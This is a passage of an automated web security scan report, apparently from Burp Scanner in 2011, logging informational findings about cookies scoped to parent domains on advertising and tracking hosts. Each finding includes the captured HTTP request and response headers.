Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 14:23:47 GMT

GIF89a.............!.......,........@..L..;

15.20. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=ab470e57-8d67-4a28-b9b1-aaf3331f5214 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251; domain=.interclick.com; expires=Sun, 25-Apr-2021 14:43:44 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 25 Apr 2011 14:43:44 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

15.21. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dB506C07761D7465D924574124E3C14DF HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:37:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:37:36 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 14:37:36 GMT

GIF89a.............!.......,........@..L..;

15.22. http://map.media6degrees.com/orbserv/aopix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/aopix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/aopix?pixId=6387&pcv=56&cb=2534812616&topHref=http%3A%2F%2Fwww.livejournal.com%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh0cf4p00736010i01407; rdrlst=40315xylk60qe0000000136010znmlk346200000002360110poljyxb4000000043601; sglst=2020s0t7ljyxb4073fa00436010i01404ag3ljyxb4073fa00436010i01404; vstcnt=417k010r014uzg6118e1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0e4d100837010i02408; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: rdrlst=40415xylk60qe00000002370113bolk7pyq0000000137010znmlk346200000003370110poljyxb4000000053701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: sglst=2020s0t7ljyxb408snm00537010i02405ag3ljyxb408snm00537010i02405; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Location: http://ad.afy11.net/ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0
Content-Length: 0
Date: Mon, 25 Apr 2011 14:37:38 GMT


15.23. http://mc.yandex.ru/watch/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mc.yandex.ru
Path:   /watch/57617

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /watch/57617?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3 HTTP/1.1
Host: mc.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://mc.yandex.ru/watch/57617/1?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3
Set-Cookie: yandexuid=1458985311303741205; domain=.yandex.ru; path=/; expires=Thu, 22-Apr-2021 14:20:05 GMT
Set-Cookie: yabs-sid=377248491303741205; path=/
Content-Length: 0


15.24. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303742441_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562769; uid=1_1303742441_1303179323923:6792170478871670; kwd=1_1303742441_11317:0_11717:0_11718:0_11719:0; sit=1_1303742441_719:0:0_2451:50869:45769_3236:208832:208714_782:563118:562769; cre=1_1303742441; bpd=1_1303742441; apd=1_1303742441; scg=1_1303742441; ppd=1_1303742441; afl=1_1303742441

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 14:41:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...

15.25. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=627389121;fpan=1;fpa=P0-962486039-1303741255035;ns=1;url=http%3A%2F%2Fgoods.adnectar.com%2Fstatic%2Fquantcast_1.html;ref=http%3A%2F%2Fwww.livejournal.com%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303741255031;tzo=300;a=p-42U4PptTYmdC- HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://goods.adnectar.com/static/quantcast_1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EGUAFu8kjVmtjIMLyxuBATcBzAaBsQDe0kyka4WR_4JMMMhgggv-JgLbZ6Qw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1160808&id=736181&id=961753&id=688926&id=1160806&id=1057233&id=1127643&id=1206656&t=2
Set-Cookie: d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Sun, 24-Jul-2011 14:34:49 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS


15.26. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=2939|1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C2%2C%2C

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

15.27. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /dynamic_preroll_playlist.fmil

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=480&height=360&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:58 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA30AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:53:58 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21629
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_8AKTzxy2lLx8IW; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:53:58 GMT; Path=/
Content-Type: application/smil
Content-Length: 3099
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="480" height="360" ba
...[SNIP]...

15.28. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif?replay_count=0&volume=100 HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; ymdt=0rO0ABXcSAAAEugAAA10AAQAAAOi7eGFI; ymvw=173_193_214_243_18R1PA3QCjJVp0

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:54:01 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_0_232
Set-Cookie: ymf=0rO0ABXcFAadrgwA*; Domain=.yumenetworks.com; Expires=Tue, 24-May-2011 14:54:01 GMT; Path=/
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
Location: http://ad.doubleclick.net/imp;v1;f;238884748;0-0;0;61850871;1|1;41734709|41752496|1;;cs=o;%3fhttp://ad.doubleclick.net/dot.gif?1303743241655
Content-Length: 0
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: image/gif


15.29. http://pogoda.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pogoda.webalta.ru
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>............ ...
...[SNIP]...

15.30. http://r2.mail.ru/b12179277.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179277.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179277.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:49 GMT
Content-Type: image/gif
Content-Length: 258
Connection: keep-alive
Set-Cookie: p=pPUGAEqlaAAA; expires=Wed, 24-Apr-13 14:20:49 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:20:49 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a..!...............................................................................................................................................................................................
...[SNIP]...

15.31. http://r2.mail.ru/b12179279.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179279.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179279.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 294
Connection: keep-alive
Set-Cookie: p=6ooGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

